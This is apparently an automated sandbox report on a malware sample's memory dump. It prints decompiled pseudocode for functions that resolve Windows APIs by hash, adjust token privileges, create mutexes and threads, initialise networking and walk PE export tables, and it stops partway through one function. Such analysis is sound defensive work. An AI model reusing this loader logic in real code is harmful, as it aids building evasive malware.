SetNamedSecurityInfoW.ADVAPI32(00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 000F1043

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: AdjustInfoLibraryLoadNamedPrivilegesSecurityToken
String ID:
API String ID: 2785814242-0
Opcode ID: c8b1fd309c41916ebc72bb8baf555108dd6aa44585f814229eac21d8c399c192
Instruction ID: 95236555f9b23b03852289d640de5e6f23de5b539baaa4192db9e25237e1d380
Opcode Fuzzy Hash: c8b1fd309c41916ebc72bb8baf555108dd6aa44585f814229eac21d8c399c192
Instruction Fuzzy Hash: 1A21A9B5D4025D7FEB1166A1AC03FFF36689B10744F050424FA18B6282F6A56E1486F2

Uniqueness

Uniqueness Score: -1.00%

Function 000F2F00, Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E000F2F00(void* __eflags) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v56;
				char _v84;
				char _v118;
				char _v160;
				intOrPtr* _t9;
				intOrPtr* _t13;
				intOrPtr* _t16;
				struct HINSTANCE__* _t17;
				WCHAR* _t19;
				struct HWND__* _t22;
				char* _t25;

				_t36 = __eflags;
				_t25 =  &_v56;
				E000F8F20(_t25, 0x28);
				_v52 = E000F1070;
				_t9 = E000EBF50(__eflags, 0, 0xa39ecc7);
				_v40 =  *_t9(0);
				_v20 = E000E7200(0x100c10,  &_v118);
				_t13 = E000EBF50(_t36, 1, 0x38227e7);
				 *_t13(_t25);
				E000EBF50(_t36, 1, 0xf3c7b77);
				_t16 = E000EBF50(_t36, 0, 0xa39ecc7);
				_t17 =  *_t16(0);
				_t19 = E000E7200(0x100790,  &_v84);
				_t22 = CreateWindowExW(0, E000E7200(0x100c10,  &_v160), _t19, 0xcf0000, 0x80000000, 0x80000000, 0x80000000, 0x80000000, 0, 0, _t17, 0); // executed
				return _t22;
			}

0x000f2f00
0x000f2f0c
0x000f2f12
0x000f2f1a
0x000f2f28
0x000f2f34
0x000f2f48
0x000f2f52
0x000f2f5b
0x000f2f64
0x000f2f75
0x000f2f7f
0x000f2f8c
0x000f2fce
0x000f2fda

APIs

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

CreateWindowExW.USER32(00000000,00000000,00000000,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000F2FCE

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CreateLibraryLoadWindow
String ID:
API String ID: 4174337752-0
Opcode ID: 234b5be58120816e071c7edc64ae4142e9beb70f62d2a4dd2f354a6901c16c7a
Instruction ID: 96b9dba66c988719a1b5284ec0bbf576776528baa44cdf280b54caf1a0ac86c6
Opcode Fuzzy Hash: 234b5be58120816e071c7edc64ae4142e9beb70f62d2a4dd2f354a6901c16c7a
Instruction Fuzzy Hash: A1115472E802187EF72066F16C03FEE36589B55B05F240035FF4CB92C3EAD12A5446B6

Uniqueness

Uniqueness Score: -1.00%

Function 000E1490, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E000E1490(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, signed char _a20, signed char _a24) {
				signed int _v20;
				char _v540;
				void* _t16;
				long _t23;
				intOrPtr* _t25;
				void* _t26;
				signed int _t27;
				signed int _t28;
				signed int _t30;
				void* _t31;
				void* _t33;

				_t27 = _a20 & 0x000000ff;
				_t28 = 0;
				_v20 = _a24 & 0x000000ff;
				do {
					_t14 =  &_v540;
					E000E5CD0(_t35, _a4,  &_v540, _t27, _v20);
					_t16 = E000F8960(_a12, _a8, _t14);
					_t33 = _t31 + 0x1c;
					if(_t16 == 0) {
						goto L2;
					}
					_t37 = _a16;
					if(_a16 == 0) {
						L1:
						E000EBF50(__eflags, 0, 0xbf8ba27);
						_t33 = _t33 + 8;
						_t23 = GetFileAttributesW(_a12); // executed
						__eflags = _t23 - 0xffffffff;
						if(__eflags == 0) {
							return 1;
						}
						goto L2;
					}
					_t25 = E000EBF50(_t37, 3, 0xd85c117);
					_t33 = _t33 + 8;
					_t26 =  *_t25(_a12, _a16);
					_t38 = _t26;
					if(_t26 != 0) {
						goto L1;
					}
					L2:
					_t30 = E000E22E0(_t38, 0,  !_t28);
					E000E1460(_t38, _t28, 1);
					_t31 = _t33 + 0x10;
					_t35 = _t30 - 0x64;
					_t28 = _t30;
				} while (_t30 != 0x64);
				return 0;
			}

0x000e14a0
0x000e14a4
0x000e14a6
0x000e14ec
0x000e14f0
0x000e14fc
0x000e150b
0x000e1510
0x000e1515
0x00000000
0x00000000
0x000e1517
0x000e151b
0x000e14b0
0x000e14b7
0x000e14bc
0x000e14c2
0x000e14c4
0x000e14c7
0x00000000
0x000e1542
0x00000000
0x000e14c7
0x000e1524
0x000e1529
0x000e1532
0x000e1534
0x000e1536
0x00000000
0x00000000
0x000e14c9
0x000e14d8
0x000e14dd
0x000e14e2
0x000e14e5
0x000e14e8
0x000e14e8
0x00000000

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction ID: c5a1fd5157b0c2405d3dda0eaa4b162c78b0b1fdb47e478b611966923a951901
Opcode Fuzzy Hash: 7dd36913ba3a0da290a7f2302420678506e15001b281f6a453d5469f6c2b69b8
Instruction Fuzzy Hash: E4110DB29002997FEF212E66AC02FFE7A699F50355F040521FC29B52D3F532CE2096A1

Uniqueness

Uniqueness Score: -1.00%

Function 000EAD80, Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E000EAD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				intOrPtr* _t16;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E000E9D50(0x647400a5);
				_t12 = E000EBF50(_t33, _t10, E000E9D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E000FB530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E000EBF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E000EB570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				_t16 = E000EBF50(0, 0, 0xb8e7db5);
				 *_t16(_v16);
				goto L7;
			}

0x000ead80
0x000ead8b
0x000ead92
0x000ead9e
0x000eadb7
0x000eadbc
0x000eadc6
0x000eadc8
0x000eadca
0x000eae26
0x000eae26
0x000eae28
0x000eae30
0x000eae30
0x000eadcc
0x000eadd2
0x000eadd7
0x000eadda
0x000eadde
0x000eade0
0x000eade2
0x000eadeb
0x000eadf0
0x000eadff
0x000eae03
0x000eae06
0x000eae0b
0x000eae0e
0x000eae0e
0x000eae03
0x000eade2
0x000eae17
0x000eae22
0x00000000

APIs

Part of subcall function 000FB530: GetTokenInformation.KERNELBASE(000EADD7,00000001,00000000,00000000,?,000EADD7,00000000), ref: 000FB55A
Part of subcall function 000FB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000FB5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 000EADFF

Part of subcall function 000EB570: HeapFree.KERNEL32(00000000,000F54D2,000F54D2,?), ref: 000EB593

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: InformationToken$FreeHeap
String ID:
API String ID: 3931431456-0
Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction ID: e36a63931eb1831ce98a8c4e41ba6a9deb171dc36f8c7314c2d9ab603e402299
Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction Fuzzy Hash: 9B110AB2E001697BD72166A1AC02BAF76689F51704F050134FD1876342FB71BA2486F2

Uniqueness

Uniqueness Score: -1.00%

Function 000F58D0, Relevance: 1.6, APIs: 1, Instructions: 58
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000F58D0(void* __eax, void* __ecx, void* __edx, void* __eflags, char _a4) {
				char _v17;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v66;
				char _v124;
				char _v238;
				char _v1278;
				char _v1794;
				void* __esi;
				signed char _t35;
				signed char _t37;
				void* _t38;
				intOrPtr* _t40;
				signed char _t44;
				intOrPtr* _t45;
				signed char _t47;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed int _t53;
				void* _t54;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t63;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t88;
				void* _t89;
				void* _t90;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;
				void* _t112;
				void* _t113;
				void* _t116;

				_t116 = __eflags;
				_push(__eax);
				_t86 = __edx;
				_t69 = __ecx;
				_v17 = _a4;
				_t89 = L000EC1E0(0x1c);
				E000FED20(_t30);
				L000FFA50(_t89, _t69);
				_t3 = _t89 + 0xc; // 0xc
				_t77 = _t3;
				L000FFA50(_t3, __edx);
				 *((char*)(_t89 + 0x18)) = _v17;
				_t35 = E000F9AC0(_t116, 0xffffffff); // executed
				_t37 = E000E4350(_t35 & 0x000000ff, 4);
				_t98 = _t95 + 0x10;
				_t117 = _t37 & 0x00000001;
				if((_t37 & 0x00000001) != 0) {
					_t77 = _t89;
					_t98 = _t98 + 4;
					_pop(_t89);
					_pop(_t86);
					_pop(_t69);
					_pop(_t93);
					_t90 = _t77;
					_t38 = E000FFCF0(_t77 + 0xc);
					_t87 =  &_v1794;
					E000F7700(_t87, _t38, 0xffffffff);
					_t40 = E000EBF50(_t117, 3, 0x5ea9ec7);
					 *_t40(_t87, _t89, _t86, _t69, _t93);
					_t44 = E000E4350(E000F9AC0(_t117, 0xffffffff) & 0x000000ff, 4);
					_t103 = _t98 - 0x6f4 + 0x20;
					if((_t44 & 0x00000001) != 0) {
						_t45 = E000EBF50(__eflags, 9, 0x28243c7);
						_t70 =  *_t45(0, 0, 2);
						_t47 = E000EA500(__eflags, _t46, 0);
						_t105 = _t103 + 0x10;
						__eflags = _t47 & 0x00000001;
						if((_t47 & 0x00000001) == 0) {
							__eflags =  *((char*)(_t90 + 0x18));
							_v24 = _t70;
							if( *((char*)(_t90 + 0x18)) == 0) {
								E000F7700( &_v1278, _t87, 0xffffffff);
								_t107 = _t105 + 0xc;
							} else {
								E000FD650(E000E7200(0x100840,  &_v66),  &_v1278, 0x208, _t60, _t87);
								_t107 = _t105 + 0x18;
							}
							_t50 = E000EBF50(__eflags, 9, 0x42453f7);
							_t108 = _t107 + 8;
							_v28 = _t50;
							_t51 = E000FFCF0(_t90);
							_t52 = E000FFCF0(_t90);
							_t88 = _v24;
							_t53 = _v28(_t88, _t52, _t51, E000F01FF, 0x110, 2, 0,  &_v1278, 0, 0, 0, 0, 0);
							__eflags = _t53;
							if(__eflags != 0) {
								_t57 = E000EBF50(__eflags, 9, 0x48eed75);
								_t108 = _t108 + 8;
								 *_t57(_t53);
							}
							_t54 = E000E9D50(0x647400a5);
							_t56 = E000EBF50(__eflags, _t54, E000E9D50(0x60faedd9));
							_t105 = _t108 + 0x10;
							_t47 =  *_t56(_t88);
						}
					} else {
						_t63 = E000E7200(0x100c50,  &_v238);
						_t112 = _t103 + 8;
						_t119 =  *((char*)(_t90 + 0x18));
						_v24 = _t63;
						if( *((char*)(_t90 + 0x18)) == 0) {
							_t64 = E000EBA30(__eflags, _t87);
							_t113 = _t112 + 4;
						} else {
							_t67 = E000E7200(0x100840,  &_v124);
							_t68 = E000E9D50(0x647402a4);
							_t84 =  &_v1278;
							_t87 =  &_v1278;
							_t64 = E000FD650(_t68, _t84, _t68, _t67,  &_v1278);
							_t113 = _t112 + 0x1c;
						}
						_t47 = E000F2450(_t119, 0x80000001, _v24, E000FFCF0(_t90), _t87, _t64);
						_t105 = _t113 + 0x14;
					}
					return _t47;
				} else {
					__eax = E000EBF50(__eflags, 0, 0xa0733d4);
					__eax = CreateThread(0, 0, E000EBE30, __esi, 0, 0); // executed
					__esp = __esp + 4;
					return __eax;
				}
			}

0x000f58d0
0x000f58d6
0x000f58da
0x000f58dc
0x000f58de
0x000f58ed
0x000f58ef
0x000f58f7
0x000f58fc
0x000f58fc
0x000f5900
0x000f5908
0x000f590d
0x000f591b
0x000f5920
0x000f5923
0x000f5925
0x000f594e
0x000f5950
0x000f5953
0x000f5954
0x000f5955
0x000f5956
0x000f223c
0x000f2241
0x000f2246
0x000f2250
0x000f225f
0x000f2268
0x000f227a
0x000f227f
0x000f2284
0x000f22e4
0x000f22f4
0x000f22f9
0x000f22fe
0x000f2301
0x000f2303
0x000f2309
0x000f230d
0x000f2310
0x000f236f
0x000f2374
0x000f2312
0x000f2331
0x000f2336
0x000f2336
0x000f237e
0x000f2383
0x000f2388
0x000f238b
0x000f2394
0x000f23ba
0x000f23be
0x000f23c1
0x000f23c3
0x000f23ce
0x000f23d3
0x000f23d7
0x000f23d7
0x000f23de
0x000f23f7
0x000f23fc
0x000f2400
0x000f2400
0x000f2286
0x000f2292
0x000f2297
0x000f229a
0x000f229e
0x000f22a1
0x000f233c
0x000f2341
0x000f22a7
0x000f22b0
0x000f22bf
0x000f22c7
0x000f22d1
0x000f22d3
0x000f22d8
0x000f22d8
0x000f2358
0x000f235d
0x000f235d
0x000f240c
0x000f5927
0x000f592e
0x000f5944
0x000f5946
0x000f594d
0x000f594d

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0000BE30,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 000F5944

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 64a9cd8d2c572ccb471552f3246cacb310b3be8aa2c6fe571de51734ee95dd56
Instruction ID: 542edf7bf4f8837fb045b8e7dd9c13f6de51a6a69e3171ea581e05dceca03e6e
Opcode Fuzzy Hash: 64a9cd8d2c572ccb471552f3246cacb310b3be8aa2c6fe571de51734ee95dd56
Instruction Fuzzy Hash: 1401FCA5B8429835E92062A53C03FFF7A584B91775F0C0075FB5D9A7C3D8416614A1F3

Uniqueness

Uniqueness Score: -1.00%

Function 000FB710, Relevance: 1.6, APIs: 1, Instructions: 50
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000FB710(void* __eflags, struct _SECURITY_ATTRIBUTES* _a4, WCHAR* _a8, intOrPtr _a12) {
				void* _t5;
				intOrPtr* _t8;
				void* _t10;
				intOrPtr* _t11;
				void* _t15;
				void* _t17;

				E000EBF50(__eflags, 0, 0xee41457);
				_t5 = CreateMutexW(_a4, 0, _a8); // executed
				_t17 = 0;
				_t25 = _t5;
				if(_t5 != 0) {
					_t15 = _t5;
					_t8 = E000EBF50(_t25, 0, E000E9D50(0x640dea48));
					_t10 = E000E3750(_t25,  *_t8(_t15, _a12), 0xffffff7f);
					_t26 = _t10;
					if(_t10 == 0) {
						_t17 = _t15;
					} else {
						_t11 = E000EBF50(_t26, 0, 0xb8e7db5);
						 *_t11(_t15);
					}
				}
				return _t17;
			}

0x000fb723
0x000fb72f
0x000fb731
0x000fb733
0x000fb735
0x000fb73a
0x000fb74c
0x000fb75e
0x000fb766
0x000fb768
0x000fb77e
0x000fb76a
0x000fb771
0x000fb77a
0x000fb77a
0x000fb768
0x000fb786

APIs

CreateMutexW.KERNEL32(?,00000000,00102850,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000FB72F

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: CreateLibraryLoadMutex
String ID:
API String ID: 427046056-0
Opcode ID: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction ID: 69e84a6547fe7dea6de73d7a850237d32bba5a1c21da708aa4951de258758327
Opcode Fuzzy Hash: f10190324e9808c8fffb4881bf8e11c177d626dab9099dcf72260aa773db75b6
Instruction Fuzzy Hash: A2F062AAA4935D3BE61025B66C43FBB724C8BD1A66F150020FE1CB7282EA51BD0045F2

Uniqueness

Uniqueness Score: -1.00%

Function 000E8290, Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E8290(intOrPtr _a4) {
				void* _t4;
				long _t6;
				void* _t8;
				intOrPtr _t9;

				_t9 = _a4;
				_t19 = _t9;
				if(_t9 == 0) {
					__eflags = 0;
					return 0;
				}
				_t4 = E000E1460(_t19, _t9, E000E9D50(0x1bde8cd4));
				_t6 = E000E22E0(_t19, _t4 + 4, E000E9D50(0x1bde8cd4));
				E000EBF50(_t19, 0, 0x8685de3);
				_t8 = RtlAllocateHeap( *0x102124, 8, _t6); // executed
				return _t8;
			}

0x000e8294
0x000e8297
0x000e8299
0x000e82ec
0x00000000
0x000e82ec
0x000e82aa
0x000e82c6
0x000e82d7
0x000e82e8
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000E82E8

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 710bfb760993f2da3e1c92eed9d7215f94e950003fc5bbc1d08add201db97b50
Instruction ID: 7aac989bb23179efde5c5fa5ee62c2b430a5ba010de566f997427153b2951d4a
Opcode Fuzzy Hash: 710bfb760993f2da3e1c92eed9d7215f94e950003fc5bbc1d08add201db97b50
Instruction Fuzzy Hash: 36E030A6D555657FD65232A27C03AEF354C4B1276AF0A0030FE0DB6243E9526E1403FB

Uniqueness

Uniqueness Score: -1.00%

Function 000FC210, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000FC210(void* __eflags) {
				char _v408;
				intOrPtr* _t2;
				signed short _t3;
				void* _t5;

				_t2 = E000EBF50(__eflags, 6, 0xaaf7240); // executed
				_t3 = E000E9BA0(_t2, 0x2ae);
				_t5 =  *_t2(_t3 & 0x0000ffff,  &_v408); // executed
				return E000E55C0(_t5, 0) & 0x00000001;
			}

0x000fc221
0x000fc230
0x000fc243
0x000fc25a

APIs

WSAStartup.WS2_32(?,?), ref: 000FC243

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction ID: 493f7be6a798513ba500bc0c37086ea58f949be130a18496dc49c89a49197dfe
Opcode Fuzzy Hash: 4829a1b5f7d1d0976f454f189348e935f6b83b4233ebfaf1aafd2ea4ee9fa5a6
Instruction Fuzzy Hash: 1CE086F2D403143BE52071B27C17FF636084711715F450460FE4C651C3F4566A2880F6

Uniqueness

Uniqueness Score: -1.00%

Function 000F0390, Relevance: 1.5, APIs: 1, Instructions: 26
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000F0390(void* __eax) {
				void _v12;
				void* _t4;
				int _t7;
				void* _t15;

				_v12 = 0xa;
				_t4 = E000E9D50(0x647400bf);
				E000EBF50(_t15, _t4, E000E9D50(0x61c0d6ad));
				_t7 = InternetSetOptionA(0, 0x49,  &_v12, 4); // executed
				return _t7;
			}

0x000f0395
0x000f03a1
0x000f03ba
0x000f03cc
0x000f03d3

APIs

InternetSetOptionA.WININET(00000000,00000049,?,00000004,?,?,?,000EC94D), ref: 000F03CC

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: InternetOption
String ID:
API String ID: 3327645240-0
Opcode ID: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction ID: 99144c93e7fc11fd0465a56a2e48b0a6f9204ade46ab29738491dafc1083461c
Opcode Fuzzy Hash: 98baf4a81c68f3c2e09b4eb87160d60d14197c57aff57431e3847a6a996ccf3d
Instruction Fuzzy Hash: 13E08CE6D802687AE71062D2AC03FFB355C8B11229F050070FA0DA5283F5A66A148AE3

Uniqueness

Uniqueness Score: -1.00%

Function 000F8F40, Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E000F8F40(intOrPtr _a4, intOrPtr _a8, signed char _a12, signed char _a16, char _a20) {
				char _t8;
				signed int _t11;
				signed int _t13;
				char _t14;
				void* _t15;

				if(_a8 == 0) {
					L7:
					return _t8;
				}
				_t13 = _a16 & 0x000000ff;
				_t11 = _a12 & 0x000000ff;
				_t14 = 0;
				_t18 = 0;
				if(0 != 0) {
					L5:
					_t18 = _a20;
					if(_a20 != 0) {
						E000EBF50(_t18, 0, 0x7a2bc0);
						_t15 = _t15 + 8;
						Sleep(0x14); // executed
					}
					while(1) {
						L3:
						 *((char*)(_a4 + _t14)) = E000ED620(_t11, _t13);
						_t8 = E000E1460(_t18, _t14, 1);
						_t15 = _t15 + 0x10;
						_t14 = _t8;
						if(_t8 == _a8) {
							goto L7;
						}
						if(_t14 == 0) {
							continue;
						}
						goto L5;
					}
					goto L7;
				}
				goto L3;
			}

0x000f8f4a
0x000f8fa5
0x000f8fa5
0x000f8fa5
0x000f8f4c
0x000f8f50
0x000f8f54
0x000f8f56
0x000f8f58
0x000f8f86
0x000f8f86
0x000f8f8a
0x000f8f93
0x000f8f98
0x000f8f9d
0x000f8f9d
0x000f8f60
0x000f8f60
0x000f8f6d
0x000f8f73
0x000f8f78
0x000f8f7e
0x000f8f80
0x00000000
0x00000000
0x000f8f84
0x00000000
0x00000000
0x00000000
0x000f8f84
0x00000000
0x000f8f60
0x00000000

APIs

Sleep.KERNEL32(00000014), ref: 000F8F9D

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction ID: 17fa1fb93b3ebed0878953136d8af85acec293b5d92aac6f60270b66351068e7
Opcode Fuzzy Hash: 22e74aa7ae2e6ede0cf4a02df25a19209aa829a3732771a0c32933063bc33dcc
Instruction Fuzzy Hash: 01F08B719053AD3ECF310A21AC01FFE3B858B82B69F084131FE0839683D934895893F1

Uniqueness

Uniqueness Score: -1.00%

Function 000EB570, Relevance: 1.3, APIs: 1, Instructions: 17
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EB570(void* _a4) {
				void* _t2;
				int _t4;
				void* _t5;

				_t5 = _a4;
				_t8 = _t5;
				if(_t5 != 0) {
					E000EBF50(_t8, 0, 0xb86de55);
					_t4 = HeapFree( *0x102124, 0, _t5); // executed
					return _t4;
				}
				return _t2;
			}

0x000eb574
0x000eb577
0x000eb579
0x000eb582
0x000eb593
0x00000000
0x000eb593
0x000eb597

APIs

HeapFree.KERNEL32(00000000,000F54D2,000F54D2,?), ref: 000EB593

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1a93157fabbec3dfd3a622e35fec880542cee6de01f4361b832396800e98ef6e
Instruction ID: db93b2ac377170698eb123eddb160c96fa1683d9358b92e551362fe8f67ae25e
Opcode Fuzzy Hash: 1a93157fabbec3dfd3a622e35fec880542cee6de01f4361b832396800e98ef6e
Instruction Fuzzy Hash: 85D0137364532477D51116957C07F97775C8B55F91F050021FE0C7715155917D1045E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000ED830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E000ED830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E000F12D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E000E9D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E000E9D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E000E1460(_t205, E000E1460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E000E1460(0,  ~( *_t143), _v40));
							E000E1460(0,  *_t143, _a4);
							E000F8F20( &_v140, E000E9D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E000FD680(0, _t91);
									_t176 = _t176 - E000E22E0(0, 0, 1);
									E000E1460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E000F00A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E000E1460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E000E9D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E000E22E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E000E1460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E000E7DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E000E1460(__eflags, E000E22E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E000E1460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E000E1460(__eflags, _t137, E000E9D50(0x3638cbc4));
										E000E1460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E000E7DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E000E9D50(0x8707952b);
